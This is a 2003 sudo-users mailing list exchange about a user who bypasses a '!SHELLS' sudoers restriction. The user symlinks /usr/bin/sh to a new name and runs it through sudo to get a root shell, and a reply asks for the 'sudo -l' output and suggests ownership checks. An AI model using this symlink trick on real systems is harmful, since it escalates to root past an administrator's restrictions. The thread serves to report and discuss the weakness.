sudo-users Digest, Vol 6, Issue 6
Molumuri, Janardhan
mjanar at corp.untd.com
Tue Jun 10 03:49:50 EDT 2003
>sudo -l output
(root) ALL
(root) !SHELLS
Thanks,
Janardhan.
-----Original Message-----
From: mlh at zipworld.com.au [mailto:mlh at zipworld.com.au]
Sent: Tuesday, June 10, 2003 12:40 PM
To: Molumuri, Janardhan
Cc: 'sudo-users at sudo.ws'
Subject: Re: sudo-users Digest, Vol 6, Issue 6
On Tue, Jun 10, 2003 at 12:15:47PM +0530, Molumuri, Janardhan wrote:
> Hi Folks,
>
> Any body has any ideas for this ?
>
> >id
> uid=22353(test) gid=10(test)
> sudo sh
> Sorry, user test is not allowed to execute '/usr/bin/sh' as root
> >ln -s /usr/bin/sh ./test1
> >sudo ./test1
> # id
> uid=0(root) gid=0(root)
What does "sudo -l" show?
It would be nice for sudo to check the ownership
of the sudo'd program and it's parent director(y,ies)
before executing it, but it's probably a little
difficult to do while avoiding races. Also slow?
Perhaps this check could be done as one of the visudo
exit sanity checks.
Matt
More information about the sudo-users
mailing list